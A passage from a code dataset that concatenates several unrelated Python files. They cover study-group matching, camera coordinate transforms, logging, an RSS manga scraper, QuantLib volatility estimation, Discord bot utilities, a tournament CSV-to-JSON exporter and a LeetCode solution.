사람들만\n # df_friends['study_with'] = df_friends['study_with'].str.replace(\" *[0-9()]*$\", \"\", regex=True)\n\n private_groups = list()\n\n for ind, each in df_friends.iterrows():\n others = {(one[:one.index('(')], one[one.index('(') + 1:one.index(')')]) for one in each['study_with'].split(' ')}\n intersection_check = False\n for private_group in private_groups:\n if len(private_group.intersection(others)) > 0:\n intersection_check = True\n private_group.update(others)\n break\n \n if intersection_check == False:\n private_groups.append(others)\n\n\n for private_group in private_groups:\n ready_to_group = True\n\n # validation check: group members\n if not 3 <= len(private_group) <= 5:\n ready_to_group = False\n\n else:\n primary_subject = None\n for each in private_group:\n name_query = df[df['name'] == each[0]].index\n phone_query = df[df['phone'].str[-4:] == each[1][-4:]].index\n\n target = name_query.intersection(phone_query)\n\n # validation check: member validity\n if len(target) != 1:\n ready_to_group = False # invalid member\n break\n\n # validation check: members except her/himself\n others = {(other[ : other.index('(')], other[other.index('(') + 1 : other.index(')')]) for other in df.at[target[0], 'study_with'].split(' ')}\n if others != private_group.difference({each, }):\n ready_to_group = False # Unknown member exists\n break\n\n # validation check: primary subject\n if primary_subject is None:\n primary_subject = df.at[target[0], 'code_1']\n elif primary_subject != df.at[target[0], 'code_1']:\n ready_to_group = False\n break\n\n if ready_to_group == False:\n for each in private_group:\n name_query = df[df['name'] == each[0]].index\n phone_query = df[df['phone'].str[-4:] == each[1][-4:]].index\n\n target = name_query.intersection(phone_query)\n\n if len(target) != 1:\n continue\n\n df.at[target[0], 'group'] = -2\n else:\n for each in private_group:\n name_query = df[df['name'] == each[0]].index\n phone_query = df[df['phone'].str[-4:] == each[1][-4:]].index\n\n target = name_query.intersection(phone_query)\n\n if len(target) != 1:\n continue\n\n df.at[target[0], 'group'] = group_num\n # df.loc[df['sid'].isin(student_id_lst), 'group'] = group_num\n group_num += 1\n\n\n # 2. 이외(혼자 신청한) 사람들한테서 신청 강의, 모임 방식 등 조사\n # df_alone = df.loc[df['study_with'].isnull()]\n df_alone = df.loc[df['group'] == 0]\n # df_alone['preference'] = df_alone['preference'].str.replace(\"[ ]\", \"\", regex=True)\n # df_alone['code_1'] = df_alone['code_1'].str.replace(\"[ ]\", \"\", regex=True)\n\n\n # # 3. 1지망 과목만 신청한 학생들 먼저 처리하기(대면/비대면 중 하나만 선택한 학생들 먼저, 그 다음에 상관없는 학생들 순으로)\n\n num_ppl = {'offline' : [], 'online' : [], 'anything' : []}\n grouped = {'offline' : dict(), 'online' : dict(), 'anything' : dict()}\n ungrouped = {'offline' : set(), 'online' : set(), 'anything' : set()}\n preference_type = {1 : 'offline', 2: 'online', 3: 'anything'}\n\n df_targets = {'offline' : [], 'online' : [], 'anything' : []}\n\n for preference in preference_type.keys():\n df_targets[preference_type[preference]] = df_alone.loc[df_alone['preference'] == preference]\n df_targets[preference_type[preference]] = df_targets[preference_type[preference]].sort_values(['study_with','preference', 'code_1', 'prof_1'], ascending=True).reset_index()\n\n num_ppl[preference_type[preference]] = get_num_people(df_targets[preference_type[preference]])\n allocate_groups_dict(df_targets[preference_type[preference]], grouped[preference_type[preference]], ungrouped[preference_type[preference]], num_ppl[preference_type[preference]])\n\n # 4. 남은 나머지 학생들 처리하기(인원이 부족하여 충원이 필요한 그룹부터 (지망 무시하고) 진행, 이후 지망 순 조합이 가능해질 때 까지 진행하고 나머지는 1지망부터 순서로 처리하기\n\n num_ppl.update({'offline_rest' : [], 'online_rest' : []})\n grouped.update({'offline_rest' : dict(), 'online_rest' : dict()})\n ungrouped.update({'offline_rest' : set(), 'online_rest' : set()})\n df_targets.update({'offline_rest' : [], 'online_rest' : []})\n\n for preference in ('offline', 'online'):\n rest = '{}_rest'.format(preference)\n df_targets[rest] = df_alone[df_alone['sid'].isin(ungrouped[preference].union(ungrouped['anything']))]\n df_targets[rest] = df_targets[rest].sort_values(['code_1'], ascending = True).reset_index()\n\n num_ppl[rest] = get_num_people_rest(df_targets[rest])\n allocate_groups_dict(df_targets[rest], grouped[rest], ungrouped[rest], num_ppl[rest])\n\n #remove allocated people\n for d in grouped[rest].keys():\n for j in grouped[rest][d]:\n for e in j :\n if e in ungrouped[preference]:\n ungrouped[preference].discard(e)\n if e in ungrouped['anything']:\n ungrouped['anything'].discard(e)\n \n for lect in grouped[rest].keys():\n if lect not in grouped[preference].keys():\n grouped[preference][lect] = grouped[rest][lect]\n else:\n grouped[preference][lect].update(grouped[rest][lect])\n\n # allocate rest people to other groups whose # of member is < 5\n\n df_targets.update({'rest' : []})\n\n for code in ('code_1', 'code_2', 'code_3'):\n df_targets['rest'] = df_alone[df_alone['sid'].isin(ungrouped['offline'].union(ungrouped['online']).union(ungrouped['anything']))]\n df_targets['rest'] = df_targets['rest'].sort_values([code], ascending = True,).reset_index(drop = True) #reset_index 해야 제대로 작동됨!\n allocate_rest_to_other_groups_code(df_targets['rest'], grouped['offline'], grouped['online'], grouped['anything'], code)\n\n df_targets['rest'] = df_alone[df_alone['sid'].isin(ungrouped['offline'].union(ungrouped['online']).union(ungrouped['anything']))]\n df_targets['rest'] = df_targets['rest'].sort_values(['code_1', 'prof_1'], ascending = True).reset_index(drop = True)\n\n\n\n # print()\n # print(\"------ 최종 ------ \")\n # print(\"offline\")\n # sum = 0\n # for e in grouped['offline'].keys(): # rest 랑 합침\n # sum += len(grouped['offline'][e])\n # print(sum)\n\n # print(\"online\")\n # sum = 0\n # for e in grouped['online']: # rest 랑 합침\n # sum += len(grouped['online'][e])\n # print(sum)\n\n # sum = 0\n # print(\"anything\")\n # for e in grouped['anything']:\n # sum += len(grouped['anything'][e])\n # print(sum)\n\n\n # print(\"——할당 안받은 사람——\")\n # print(ungrouped['offline'])\n # print(ungrouped['online'])\n # print(ungrouped['anything'])\n # print(len(ungrouped['offline'].union(ungrouped['online']).union(ungrouped['anything'])))\n # print()\n\n\n # (option) 5. 3명 그룹 -> 줄이기\n\n # 6. 인원 수에 맞춰서 그룹 번호 매기기\n # group_num = 1\n for preference in preference_type.values():\n for code, student_id_lst in grouped[preference].items():\n\n n = len(student_id_lst)\n\n if n < 11:\n group_numbers = [[3], [4], [5], [3, 3], [4, 3], [4, 4], [5, 4], [5, 5]][n - 3]\n else:\n group_numbers = [[4, 4], [4, 4], [5, 4], [5, 5]][n % 4 - 3] + ([4] * (((n + 1) // 4) - 3)) + ([3] if n % 4 == 3 else [4])\n\n for sid in student_id_lst:\n df.at[df['sid'] == sid, 'group'] = group_num\n\n group_numbers[0] -= 1\n if group_numbers[0] == 0:\n del group_numbers[0]\n group_num += 1\n\n # 7. result.csv 파일로 저장\n df = df.sort_values('group', ascending=True).reset_index(drop=True)\n df.to_csv(\"result.csv\", float_format='%.f', index = False, encoding = 'EUC-KR')","sub_path":"photos/auto_match.py","file_name":"auto_match.py","file_ext":"py","file_size_in_byte":12905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"92159869","text":"from math import cos, sin, asin, sqrt, acos, atan2, pi\n\nclass Camera():\n def __init__(self,translation,starting,camera):\n self.dx,self.dy,self.dz = translation[0],translation[1],translation[2]\n self.sx,self.sy,self.sz = starting[0],starting[1],starting[2]\n self.cx,self.cy,self.cz = camera[0],camera[1],camera[2]\n # normalize\n self.s_mag = sqrt(self.sx**2+self.sy**2+self.sz**2)\n self.c_mag = sqrt(self.cx**2+self.cy**2+self.cz**2)\n # self.sx = self.sx/(self.s_mag)\n # self.sy = self.sy/(self.s_mag)\n # self.sz = self.sz/(self.s_mag)\n # self.cx = self.cx/(self.c_mag)\n # self.cy = self.cy/(self.c_mag)\n # self.cz = self.cz/(self.c_mag)\n # print(self.cx,self.cy,self.cz)\n def global_to_local(self,xg,yg,zg):\n # cross product\n rx = self.sy/self.s_mag*self.cz/self.c_mag - self.sz/self.s_mag*self.cy/self.c_mag\n ry = self.sz/self.s_mag*self.cx/self.c_mag - self.sx/self.s_mag*self.cz/self.c_mag\n rz = self.sx/self.s_mag*self.cy/self.c_mag - self.sy/self.s_mag*self.cx/self.c_mag\n print(rx,ry,rz)\n\n # angle to turn through\n # theta = -asin(sqrt(rx**2 + ry**2 + rz**2))\n # /(self.s_mag*self.c_mag)\n theta = -acos((self.sx*self.cx+self.sy*self.cy+self.sz*self.cz)/(self.s_mag*self.c_mag))\n print(theta*180.0/pi)\n\n # local cartesian coordinates\n xc = (rx*rx*(1-cos(theta))+cos(theta))*xg + (rx*ry*(1-cos(theta))-rz*sin(theta))*yg + (rx*rz*(1-cos(theta))+ry*sin(theta))*zg + self.dx\n yc = (rx*ry*(1-cos(theta))+rz*sin(theta))*xg + (ry*ry*(1-cos(theta))+cos(theta))*yg + (ry*rz*(1-cos(theta))-rx*sin(theta))*zg + self.dy\n zc = (rx*rz*(1-cos(theta))-ry*sin(theta))*xg + (ry*rz*(1-cos(theta))+rx*sin(theta))*yg + (rz*rz*(1-cos(theta))+cos(theta))*zg + self.dz\n\n # convert local cartesian to local spherical polar\n rho = sqrt(xc**2+yc**2+zc**2)\n theta = acos(float(zc)/float(rho))\n phi = atan2(yc,xc)\n\n # report final values\n print(xc,yc,zc)\n # print(rho,theta*180.0/pi,phi*180.0/pi)\n return (rho,theta,phi)\n def local_to_global(self,rho,theta,phi):\n xc = rho*sin(theta)*cos(phi)\n yc = rho*sin(theta)*sin(phi)\n zc = rho*cos(theta)\n print(xc,yc,zc)\n # cross product\n rx = self.cy/self.c_mag*self.sz/self.s_mag - self.cz/self.c_mag*self.sy/self.s_mag\n ry = self.cz/self.c_mag*self.sx/self.s_mag - self.cx/self.c_mag*self.sz/self.s_mag\n rz = self.cx/self.c_mag*self.sy/self.s_mag - self.cy/self.c_mag*self.sx/self.s_mag\n\n # angle to turn through\n theta = -asin(sqrt(rx**2 + ry**2 + rz**2))\n # theta = -acos((self.sx*self.cx+self.sy*self.cy+self.sz*self.cz)/(self.s_mag*self.c_mag))\n print(theta*180.0/pi)\n\n # local cartesian coordinates\n xg = (rx*rx*(1-cos(theta))+cos(theta))*xc + (rx*ry*(1-cos(theta))-rz*sin(theta))*yc + (rx*rz*(1-cos(theta))+ry*sin(theta))*zc - self.dx\n yg = (rx*ry*(1-cos(theta))+rz*sin(theta))*xc + (ry*ry*(1-cos(theta))+cos(theta))*yc + (ry*rz*(1-cos(theta))-rx*sin(theta))*zc - self.dy\n zg = (rx*rz*(1-cos(theta))-ry*sin(theta))*xc + (ry*rz*(1-cos(theta))+rx*sin(theta))*yc + (rz*rz*(1-cos(theta))+cos(theta))*zc - self.dz\n return (xg,yg,zg)\n\ncamera1 = Camera([0,0,0],[1,0,0],[1,1,1])\nrho,theta,phi = camera1.global_to_local(1,1,1)\nprint(rho,theta*180.0/pi,phi*180.0/pi)\nprint(camera1.local_to_global(rho,theta,phi))","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"274694050","text":"import logging\nfrom datetime import datetime\n\nclass logger:\n\n def __init__(self,handler:str):\n \"\"\"Create a logger\n\n Args:\n handler (str): Handler for the logger\n \"\"\"\n now = datetime.now()\n time = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n \n logs_filename = f\"logs/{handler}/{time}-log.txt\"\n handle=handler\n logging.basicConfig(filename=logs_filename,filemode=\"w\",level=logging.NOTSET)\n self.logger = logging.getLogger(handle)\n\n\n def log_info(self,msg: str):\n \"\"\" Functión to Log an info message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n if not msg==\"\":\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.info(msg)\n else:\n pass\n\n def log_warning(self,msg: str):\n \"\"\" Functión to Log an warning message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.warning(msg)\n\n def log_error(self,msg: str):\n \"\"\" Functión to Log an error message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.error(msg)\n\n def log_critical(self,msg: str):\n \"\"\" Functión to Log an critical error message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.critical(msg)\n\n def log_debug(self,msg: str):\n \"\"\" Functión to Log an debug message in logs file\n Args:\n msg (str): Message to log\n \"\"\"\n now = datetime.now()\n logs_hour = now.strftime(\"%H:%M:%S\")\n msg = f\"{logs_hour}-{msg}\"\n self.logger.debug(msg)","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524908159","text":"import time\nfrom abc import ABC, abstractmethod\nfrom calendar import timegm\nfrom datetime import datetime, timedelta\nimport feedparser\nfrom typing import Optional, List, Iterable, Dict, Pattern, Any, Type, Union\nimport logging\n\nimport psycopg2\n\nfrom src.db.mappers.chapter_mapper import ChapterMapper\nfrom src.errors import FeedHttpError, InvalidFeedError\nfrom src.scrapers.base_scraper import BaseScraper, BaseChapter\nfrom src.utils.utilities import (match_title, is_valid_feed, group_by_manga,\n get_latest_chapters)\n\nlogger = logging.getLogger('debug')\n\n\nclass RSSChapter(BaseChapter):\n \"\"\"\n A sensible default implementation for a chapter in an RSS feed\n \"\"\"\n def __init__(self,\n chapter_title: Optional[str],\n chapter_number: str,\n chapter_identifier: str,\n title_id: str,\n volume: str = None,\n decimal: str = None,\n release_date: Optional[Union[time.struct_time, datetime]] = None,\n manga_title: str = None,\n manga_url: str = None,\n group: str = None\n ):\n self._chapter_title = chapter_title\n self._chapter_number = int(chapter_number)\n self._chapter_identifier = chapter_identifier\n self._title_id = title_id\n self._volume = int(volume) if volume else None\n self._decimal = int(decimal) if decimal else None\n self._manga_title = manga_title\n self._manga_url = manga_url\n self._group = group\n\n if isinstance(release_date, time.struct_time):\n self._release_date = datetime.utcfromtimestamp(timegm(release_date))\n else:\n self._release_date = release_date if release_date else datetime.utcnow()\n\n @property\n def chapter_title(self) -> Optional[str]:\n return self._chapter_title\n\n @property\n def chapter_number(self) -> int:\n return self._chapter_number\n\n @property\n def volume(self) -> Optional[int]:\n return self._volume\n\n @property\n def decimal(self) -> Optional[int]:\n return self._decimal\n\n @property\n def release_date(self) -> datetime:\n return self._release_date\n\n @property\n def chapter_identifier(self) -> str:\n return self._chapter_identifier\n\n @property\n def title_id(self) -> str:\n return self._title_id\n\n @property\n def manga_title(self) -> Optional[str]:\n return self._manga_title\n\n @property\n def manga_url(self) -> Optional[str]:\n return self._manga_url\n\n @property\n def group(self) -> Optional[str]:\n return self._group\n\n @property\n def title(self) -> str:\n return self.chapter_title or f'{\"Volume \" + str(self.volume) + \", \" if self.volume is not None else \"\"}Chapter {self.chapter_number}{\"\" if not self.decimal else \".\" + str(self.decimal)}'\n\n\nclass BaseRSS(BaseScraper, ABC):\n TITLE_REGEX: Pattern = None\n Chapter: Type[RSSChapter] = RSSChapter\n\n def __init_subclass__(cls, **kwargs):\n if cls.TITLE_REGEX is None:\n raise NotImplementedError('Service does not have a title regex to parse entries')\n\n @abstractmethod\n def get_chapter_id(self, entry: Dict) -> str:\n \"\"\"\n A method to get the chapter id for a feed entry\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n The id of the chapter\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def get_chapter_title(self, entry: Dict) -> Optional[str]:\n \"\"\"\n Return the title of the chapter or None if the chapter name should be automatically generated\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n Title of the chapter or None\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def get_title_id(self, entry: Dict) -> str:\n \"\"\"\n Get the title id for the manga of an entry\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n The title id\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def get_group(self, entry: Dict) -> Optional[str]:\n \"\"\"\n Return the group responsible for this chapter\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n Name of the group\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_manga_title(self, entry: Dict) -> Optional[str]:\n \"\"\"\n Get the title of the manga\n Args:\n entry: A single entry in the RSS feed\n\n Returns:\n Title of the manga\n \"\"\"\n raise NotImplementedError\n\n def set_checked(self, service_id: int) -> None:\n try:\n super().set_checked(service_id)\n self.dbutil.update_service_whole(service_id, self.min_update_interval())\n except psycopg2.Error:\n logger.exception(f'Failed to update service {service_id}')\n\n def parse_feed(self, entries: Iterable[Dict]) -> List[RSSChapter]:\n titles = []\n for entry in entries:\n title = entry.get('title', '')\n match = self.TITLE_REGEX.match(title)\n kwargs: Dict[str, Any]\n if not match:\n match = match_title(title)\n if not match:\n logger.warning(f'Could not parse title from {title or entry}')\n continue\n\n logger.info(f'Fallback to universal regex successful on {title or entry}')\n\n kwargs = match\n else:\n kwargs = match.groupdict()\n\n kwargs['chapter_identifier'] = self.get_chapter_id(entry)\n kwargs['title_id'] = self.get_title_id(entry)\n kwargs['manga_title'] = self.get_manga_title(entry) or kwargs.get('manga_title')\n\n if not kwargs['title_id'] or not kwargs['chapter_identifier']:\n logger.warning(f'Could not parse ids from {entry}')\n continue\n\n if 'chapter_title' not in kwargs:\n kwargs['chapter_title'] = self.get_chapter_title(entry)\n\n kwargs['manga_url'] = self.MANGA_URL_FORMAT.format(kwargs['title_id'])\n kwargs['release_date'] = entry.get('published_parsed') or entry.get('updated_parsed')\n kwargs['group'] = self.get_group(entry)\n\n try:\n titles.append(self.Chapter(**kwargs))\n except:\n logger.exception(f'Failed to parse chapter {entry}')\n continue\n\n return titles\n\n @staticmethod\n def min_update_interval() -> timedelta:\n return BaseRSS.UPDATE_INTERVAL\n\n def scrape_series(self, title_id: str, service_id: int, manga_id: int,\n feed_url: Optional[str] = None) -> Optional[bool]:\n pass\n\n def scrape_service(self, service_id: int, feed_url: str,\n last_update: Optional[datetime],\n title_id: Optional[str] = None):\n feed = feedparser.parse(feed_url if not title_id else feed_url + f'/manga_id/{title_id}')\n try:\n is_valid_feed(feed)\n except (FeedHttpError, InvalidFeedError):\n logger.exception(f'Failed to fetch feed {feed_url}')\n return\n\n entries: List[RSSChapter] = self.dbutil.get_only_latest_entries(service_id, self.parse_feed(feed.entries))\n\n if not entries:\n logger.info('No new entries found')\n return\n\n logger.info('%s new chapters found. %s', len(entries),\n [e.chapter_identifier for e in entries])\n\n titles = group_by_manga(entries)\n\n chapters = []\n manga_ids = set()\n\n # Find already added titles\n with self.conn:\n with self.conn.cursor() as cur:\n for row in self.dbutil.find_added_titles(cur, tuple(titles.keys())):\n manga_id = row['manga_id']\n manga_ids.add(manga_id)\n for chapter in titles.pop(row['title_id']):\n chapters.append(ChapterMapper.base_chapter_to_db(chapter, manga_id, service_id))\n\n # Add new titles\n if titles:\n with self.conn:\n with self.conn.cursor() as cur:\n for manga_id, inner_chapters in self.dbutil.add_new_series(cur, titles, service_id, True):\n manga_ids.add(manga_id)\n for chapter in inner_chapters:\n chapters.append(ChapterMapper.base_chapter_to_db(chapter, manga_id, service_id))\n\n self.dbutil.add_chapters(chapters, fetch=False)\n\n chapter_rows = [{\n 'chapter_decimal': c.chapter_decimal,\n 'manga_id': c.manga_id,\n 'chapter_number': c.chapter_number,\n 'release_date': c.release_date\n } for c in chapters]\n self.dbutil.update_latest_chapter(tuple(c for c in get_latest_chapters(chapter_rows).values()))\n\n return manga_ids\n\n def add_service(self):\n self.add_service_whole()\n","sub_path":"src/scrapers/base_rss.py","file_name":"base_rss.py","file_ext":"py","file_size_in_byte":9165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"215520878","text":"from Utilities.utilities import *\nfrom bs_model.bs_estimate_vol import estimiate_bs_constant_vol\nimport QuantLib as ql\nimport timeit\nimport os\nimport pickle\n\n\nstart = timeit.default_timer()\n\ncalendar = ql.China()\ndaycounter = ql.ActualActual()\n\n\nbegDate = ql.Date(1, 9, 2015)\n#begDate = ql.Date(18, 7, 2017)\nendDate = ql.Date(20, 7, 2017)\nevalDate = begDate\n\nestimatied_vols = {}\nwhile evalDate < endDate:\n print('Start : ', evalDate)\n\n evalDate = calendar.advance(evalDate, ql.Period(1, ql.Days))\n ql.Settings.instance().evaluationDate = evalDate\n try:\n print(evalDate)\n\n estimate_vol, min_sse = estimiate_bs_constant_vol(evalDate, calendar, daycounter)\n estimatied_vols.update({to_dt_date(evalDate):estimate_vol})\n print(estimate_vol)\n except Exception as e:\n print(e)\n continue\n\nprint('estimatied_vols = ',estimatied_vols)\nstop = timeit.default_timer()\nprint('calibration time : ',stop-start)\n\nwith open(os.getcwd()+'/intermediate_data/total_hedging_bs_estimated_vols.pickle','wb') as f:\n pickle.dump([estimatied_vols],f)\n\n\n","sub_path":"bs_model/bs_estimate_vols_ts.py","file_name":"bs_estimate_vols_ts.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"622189710","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 27 22:26:15 2017\n\n@author: Paulo Batista\nML Classification from Google Developers\n\"\"\"\n\nfrom sklearn import tree\nfeatures = [[140,1], [130,1], [150, 0], [170, 0]]\nlabels = [0, 0, 1, 1]\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(features, labels)\nprint(clf.predict([[120,0]]))\n","sub_path":"google-developers/ml-classification1.py","file_name":"ml-classification1.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"357503769","text":"import discord\nfrom discord.ext import commands\nimport variables\nimport random\nimport os\nimport pymongo\nfrom pymongo import MongoClient\nimport smtplib, ssl\nimport datetime\nfrom datetime import datetime, timedelta\nimport os\n\n\nmongodb_credentials = os.getenv('mongodb')\ncluster = MongoClient(mongodb_credentials)\ndb = cluster[\"Real_Esports_Bot\"]\ncollection = db[\"countr\"]\n\n# Returns a colour with a set chance \ndef randomc():\n chance = random.randint(0, 100) \n if chance <= 10:\n randomcolour = 0x800080 #purple\n return randomcolour\n elif chance <= 20:\n randomcolour = 0xFFFF00 #yellow\n return randomcolour\n elif chance <= 30:\n randomcolour = 0x00FFFF #cyan\n return randomcolour\n elif chance <= 40:\n randomcolour = 0xFF0000 #red\n return randomcolour\n elif chance <= 50:\n randomcolour = 0xFFFFFF # white\n return randomcolour\n else:\n randomcolour = 0x00FF00 #green\n return randomcolour\n\n# send team names with user to the channel\nasync def update_confirm_teams(ctx, user, *arg1):\n query = {\"_id\" : \"teamcounter\"}\n doc = collection.find(query)\n for result in doc:\n score = result[\"counter\"]\n score = score + 1\n collection.update_one({\"_id\": \"teamcounter\"},{\"$set\": {\"counter\": score}},)\n return score\n\n# returns random emote\ndef randomemote():\n opemotes = [\" \",\n \" \",\n \" \",\n \"<:ATD_vortexScam:801698916373495819> \",\n \" \",\n \" \",\n \" \",\n \"\",\n \" \",\n \" \" ]\n random_emote = random.choice(opemotes)\n return random_emote\n\ndef addnewuserinfraction(message):\n# ----------------------------------------\n mongodb_credentials = os.getenv('mongodb')\n cluster = MongoClient(mongodb_credentials)\n db = cluster[\"Real_Esports_Bot\"]\n collection = db[\"watcher_bot_v2\"]\n# ----------------------------------------\n \n \n post = {\n \"_id\": message.author.id,\n \"rajumentions\": 1,\n \"name\": message.author.name,\n \"time\": datetime.now()\n }\n collection.insert_one(post)\n\ndef adduserinfraction(message):\n# ----------------------------------------\n mongodb_credentials = os.getenv('mongodb')\n cluster = MongoClient(mongodb_credentials)\n db = cluster[\"Real_Esports_Bot\"]\n collection = db[\"watcher_bot_v2\"]\n# ----------------------------------------\n\n query = {\"_id\": message.author.id}\n user = collection.find(query)\n for result in user:\n score = result[\"rajumentions\"]\n score = score + 1\n collection.update_one(\n {\"_id\": message.author.id},\n {\"$set\": {\n \"rajumentions\": score\n }},\n )\n collection.update_one(query,\n {\"$set\": {\n \"time\": datetime.now()\n }})\n\n \n\n\n\n\n\n\n ","sub_path":"cmds/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"617800924","text":"import unittest\nfrom fibonacci import fib\nclass FibonacciTestSuite(unittest.TestCase):\n\t\n\tdef test_fibonacci(self):\n\t\tcases=[(0, 0), (1, 1), (2, 1), (3, 2), (4, 3)]\n\t\tfor i in range(0, len(cases)):\n\t\t\tself.assertEqual( cases[i][1], fib(cases[i][0]) )\t\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"fibonacci/testfibonacci.py","file_name":"testfibonacci.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"132477114","text":"import csv\nimport json\nfrom datetime import date\n\n\ndef export_json(input_csv, name):\n \"\"\"\n Creates json that matches ABR format\n \"\"\"\n e_json = {\n \"name\": name,\n \"date\": date.today().strftime(\"%Y-%m-%d\"),\n \"cutToTop\": 0,\n \"preliminaryRounds\": 0,\n \"tournamentOrganiser\": {\"nrdbId\": \"\", \"nrdbUsername\": \"YsengrinSC\"},\n \"players\": [],\n \"eliminationPlayers\": {},\n \"uploadedFrom\": \"SASS\",\n \"links\": {\n 0: {\n \"rel\": \"schemaderivedfrom\",\n \"href\": \"http://steffens.org/nrtm/nrtm-schema.json\",\n },\n 1: {\n \"rel\": \"uploadedfrom\",\n \"href\": \"https://github.com/Chemscribbler/Netrunner/tree/main/SingleSided_App\",\n },\n },\n }\n\n with open(input_csv, \"r\", encoding=\"cp1257\") as csvfile:\n reader = csv.DictReader(csvfile)\n count = 0\n for row in reader:\n e_json[\"players\"].append(\n {\n \"id\": count,\n \"name\": row[\"Player\"],\n \"rank\": row[\"Position\"],\n \"corpIdentity\": row[\"Corp\"],\n \"runnerIdentity\": row[\"Runner\"],\n \"matchPoints\": row[\"Score\"],\n \"strengthOfSchedule\": round(float(row[\"SoS\"]), 4),\n \"extendedStrengthOfSchedule\": round(float(row[\"eSoS\"]), 6),\n \"sideBalance\": row[\"SideBalance\"],\n }\n )\n count += 1\n\n return e_json\n\n\nif __name__ == \"__main__\":\n file_name = input(\"File Name: \")\n t_name = input(\"Tournament Name: \")\n with open(\"results.json\", \"w\") as outfile:\n json.dump(export_json(file_name, t_name), outfile)\n\n","sub_path":"app/util/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"134990228","text":"# -- coding = 'utf-8' -- \n# Author Kylin\n# Python Version 3.7.3\n# OS macOS\n\"\"\"\nNo. 360 有序转化数组\n需求:\n 给你一个已经排好序的整数数组nums和整数a、b、c。\n 对于数组中的每一个元素nums[i] ,计算函数值f(x) = ax^2 + bx + c ,请按升序返回数组。\n\n\"\"\"\n\n\ndef sortTransformedArray_map(nums, a, b, c):\n \"\"\"\n 利用map直接计算相关元素的函数值,然后对结果进行排序\n 时间复杂度:O(nlogn),用于排序\n 空间复杂度:O(1)\n :type nums: List[int]\n :type a: int\n :type b: int\n :type c: int\n :rtype: List[int]\n \"\"\"\n\n def calculate(x):\n return a * x**2 + b * x + c\n\n res_list = list(map(calculate, nums))\n\n res_list.sort()\n\n return res_list\n\n\ndef sortTransformedArray_math(nums, a, b, c):\n \"\"\"\n 基于一元二次函数的性质\n 不使用排序,使用双指针,优化时间复杂度\n 时间复杂度:O(n)\n 空间复杂度:O(1)\n :param nums:\n :param a:\n :param b:\n :param c:\n :return:\n \"\"\"\n def calculate(x):\n return a * (x**2) + b * x + c\n\n n = len(nums)\n res_list = [0 for _ in range(n)]\n\n # 如果a == 0,函数f(x)退化为线性函数bx+c\n if a == 0:\n res_index = 0\n if b >= 0:\n for i in range(n):\n res_list[res_index] = calculate(nums[i])\n res_index += 1\n\n else:\n for i in range(n-1, -1, -1):\n res_list[res_index] = calculate(nums[i])\n res_index += 1\n else:\n # 否则,f(x)是二次函数,在在x=-b/2a取得极值\n diad = - (b / (2.0 * a))\n left, right = 0, n - 1\n if a > 0:\n # 如果 a > 0, f(x)是一个凹函数,在x=-b/2a取得最小值\n res_index = n - 1\n while left < right:\n if abs(nums[left] - diad) > abs(nums[right] - diad):\n res_list[res_index] = calculate(nums[left])\n left += 1\n\n else:\n res_list[res_index] = calculate(nums[right])\n right -= 1\n res_index -= 1\n # 记得加上最后一个元素,也就是left == right时\n res_list[res_index] = calculate(nums[left])\n else:\n # 如果 a < 0, f(x)是一个凹函数,在x=-b/2a取得最大值\n res_index = 0\n while left < right:\n if abs(nums[left] - diad) >= abs(nums[right] - diad):\n res_list[res_index] = calculate(nums[left])\n left += 1\n else:\n res_list[res_index] = calculate(nums[right])\n right -= 1\n res_index += 1\n # 记得加上最后一个元素,也就是left == right时\n res_list[res_index] = calculate(nums[left])\n\n return res_list\n\n\nif __name__ == \"__main__\":\n nums = [-4, -2, 2, 4]\n a, b, c = -1, 3, 5\n sort_res = sortTransformedArray_math(nums, a, b, c)\n print(sort_res)\n","sub_path":"LeetCode/src/calculate08/sort_transformed_array.py","file_name":"sort_transformed_array.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"553322793","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass 